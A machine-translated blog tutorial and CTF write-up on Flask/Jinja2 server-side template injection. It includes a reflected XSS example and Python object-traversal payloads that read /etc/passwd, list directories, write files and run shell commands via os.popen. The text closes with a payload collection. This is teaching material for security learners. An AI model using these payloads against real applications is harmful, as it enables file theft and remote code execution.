当前位置:网站首页>Flask template injection
Flask template injection
2022-07-19 02:36:00 【jjj34】
Reference link
Learning from scratch flask Template Injection - FreeBuf Network security industry portal
Catalog
The incorrect code is as follows :
2.SSTI File read / Command execution
1. First, determine whether it exists template Inject
2. Explore the available methods
1. Find the following , Prepare for file reading
2. Keep looking , Prepare for command execution
flask Basics
Let's look at a paragraph first python Code
from flask import flask
@app.route('/index/')
def hello_world():
return 'hello world'1.route :
route It's a decorator , The function is to combine the function with url Bind together
The code in the sample is when accessing 127.0.0.1/index/ when ,flask Go back hello world
2. rendering method
flask There are two methods of rendering
1.render_template
render_template() Used to render a specified file , Such as
return render_template('index.html')
2.render_template_string
render_template_string For rendering strings , Such as
html = '<h1> This is index page </h1>'
return render_template_string(html)3. Use of templates
flask It's using jinja2 To be a rendering engine .
Use : Create a new in the root directory of the website templates Folder , For storage html file . That is, the template file
test.py
from flask import Flask,url_for,redirect,render_template,render_template_string
@app.route('/index/')
def user_login():
return render_template('index.html')/templata/index.html
<h1>{
{content}}</h1>This page still outputs This is index page
{ {}} stay Jinja2 As a variable package identifier
Template Injection
reason : Incorrect use of flask Medium render_template_string Method raises SSTI.
1.xss Inject
The incorrect code is as follows :
@app.route('/test/')
def test():
code = request.args.get('id')
html = '''
<h3>%s</h3>
'''%(code)
return render_template_string(html)The reason for not being right : code It's user controlled , User pass ?id= That's right code Control , Which in turn affects
<h3>%s</h3> Lead to Inject
When code by </h3> <script>alert(1)</script> <h3> when ,
The executed code becomes
<h3> </h3> <script>alert(1)</script> <h3></h3>
Cause reflex xss Happen
modify
@app.route('/test/')
def test():
code = request.args.get('id')
return render_template_string('<h1>{
{ code }}</h1>',code=code)First the code Convert to string , In this way, the above problems will not occur
Such as , The original sentence is output instead of being taken as JavaScript Language execution
2.SSTI File read / Command execution
Basic knowledge of
stay Jinja2 In the template engine ,{ {}} Is the variable package identifier ,{ {}} Not only variables can be passed , You can also execute some simple expressions , Such as
@app.route('/test/')
def test():
code = request.args.get('id')
html = '''
<h3>%s</h3>
'''%(code)
return render_template_string(html)In this code , When the user enters ?id={ {2*4}} when , The following will appear
File read
utilize 40 Templates <type 'file'>,payload as follows :
#1. Get the class object of the string
{
{''.__class__}}
#2. Find the base class
{
{''.__class__.__mro__}}
#3. Look for referential classes
{
{''.__class__.__mro__[2].__subclasses__()}}
# Classes that can be referenced
#{
{''.__class__.__mro__[2].__subclasses__()[40]}} -> <type `file`>
# Utilization mode
{
{''.__class__.__mro__[2].__subclasses__()[40]}('/etc/passwd').read()}Command execution
The template used is 71 <class 'site._Printer'>,payload as follows
{
{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].listdir('.')}}
listdir yes os The function in , Connection path
Example
In the offensive and defensive world Web_python_template_injection
link : subject (xctf.org.cn)
Ideas : Find the parent class <type ‘object’>–> Find subclasses –> Find modules about command execution or file operation .
solution :
1. First, determine whether it exists template Inject
obviously , The order was executed payload by { {2*4}}
2. Explore the available methods
payload as follows :
{
{''.__class__.__mro__[2].__subclasses__()}}1. Find the following <type 'file'> , Prepare for file reading
Pictured , <type 'file'> It can be used , Subscript to be 40
Add : The serial number is the position of the function , Count from the first , The first is 0
2. Keep looking <class 'site._Printer>, Prepare for command execution
<class 'site.Printer'> Also exist , Serial number for 71
3. obtain flag
First find flag Location
{
{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].listdir('.')}}
Read fl4g file
{
{''.__class__.__mro__[2].__subclasses__()[40]('./fl4g').read()}}
Add
payload collect
// Get the basic class
''.__class__.__mro__[1]
{}.__class__.__bases__[0]
().__class__.__bases__[0]
[].__class__.__bases__[0]
object
// Reading documents
().__class__.__bases__[0].__subclasses__()[40](r'C:\1.php').read()
object.__subclasses__()[40](r'C:\1.php').read()
// Writing documents
().__class__.__bases__[0].__subclasses__()[40]('/var/www/html/input', 'w').write('123')
object.__subclasses__()[40]('/var/www/html/input', 'w').write('123')
// Execute arbitrary orders
().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.values()[13]['eval']('__import__("os").popen("ls /var/www/html").read()' )
object.__subclasses__()[59].__init__.func_globals.values()[13]['eval']('__import__("os").popen("ls /var/www/html").read()' )Several magic functions
__class__ Returns the object to which the type belongs
__mro__ Returns a tuple containing the base class inherited by the object , Method parses in the order of tuples .
__base__ Returns the base class inherited by the object // __base__ and __mro__ Are used to find base classes
__subclasses__ Each new class retains references to subclasses , This method returns a list of references that are still available in a class
__init__ Class
__globals__ Reference to the dictionary containing the global variables of the function
边栏推荐
- sqlmap的使用
- For solopi app performance test
- Logic vulnerability - login verification code security
- 【已解决】参考了本地mysql忘记密码后, [Server] --initialize specified but the data directory has files in it. Aborti
- bugku---game1
- Inverse yuan (I'll add these words if there are too many people using the name)
- uniapp微信小程序登录(先授权微信后授权手机号)-- (1)
- Metersphere is based on JMeter distributed performance pressure testing platform
- Performance test implementation specification Guide
- 服务器知识(详情)
猜你喜欢
随机推荐
元宇宙公链Caduceus项目详解(一):Caduceus Metaverse Protocol的项目理念及技术框架
Detailed explanation of metauniverse public chain caduceus: a creative platform specially built for metauniverse application
Inverse yuan (I'll add these words if there are too many people using the name)
MeterSphere基于JMeter分布式性能压测平台
BeanShell脚本获取当前时间
Interface (collection/map) - implementation and comparison of interfaces
Post man JSON script to JMX script of JMeter
性能测试实施规范指南
Lecture 2 BTC cryptography principles (notes)
《Visual C#从入门到精通》个人学习整理
【Antv G2】折线图如何添加点击事件(点击任意位置即可获取折线上点的值)
Make a simple record and check the set
最长上升子序列----优化
Attack and defense world - easytornado notes
全链路压测
项目性能优化实战:解决首页白屏问题,自定义 loading 动画优化首屏效果
Find() (if the name is used by too many people, I will add words)
[tools] unity quickly starts to make the artifact tilemap of 2D and 2.5D games
Attack and defense the world ---- shrink
uni app 微信小程序 点餐系统【再来一单】页面跳转